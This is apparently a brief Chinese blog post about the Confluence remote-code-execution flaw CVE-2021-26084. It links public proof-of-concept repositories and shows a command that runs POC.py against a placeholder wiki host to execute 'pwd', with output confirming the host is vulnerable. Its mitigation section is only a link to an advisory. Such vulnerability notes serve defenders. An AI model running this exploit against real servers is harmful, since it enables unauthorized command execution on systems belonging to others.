confluence漏洞CVE-2021-26084处理
登录
标签搜索
侧边栏壁纸
博主昵称
yuc

  • 累计撰写 291 篇文章
  • 累计收到 0 条评论
技术

confluence漏洞CVE-2021-26084处理

yuc
yuc
2022-02-15 / 最后修改: 2022-07-22 08:21 / 0 评论 / 772 阅读 / 正在检测是否收录...
0x0 风险问题

参考注入代码:

https://github.com/0xf4n9x/CVE-2021-26084
https://github.com/h3v0x/CVE-2021-26084_Confluence/

注入POC:

python3 POC.py -u "https://wiki.xxx.com" -e pwd

回显结果:

[+] https://wiki.xxx.com/pages/createpage-entervariables.action?SpaceKey=x is vulnerable!
/home/wiki/confluence/bin
0x1 防护措施
http://blog.nsfocus.net/atlassian-confluence/
0
暂无标签
版权属于: yuc
本文链接: http://www.yuc.pub:12345/index.php/archives/209/
作品采用: 署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0) 》许可协议授权

评论

博主关闭了当前页面的评论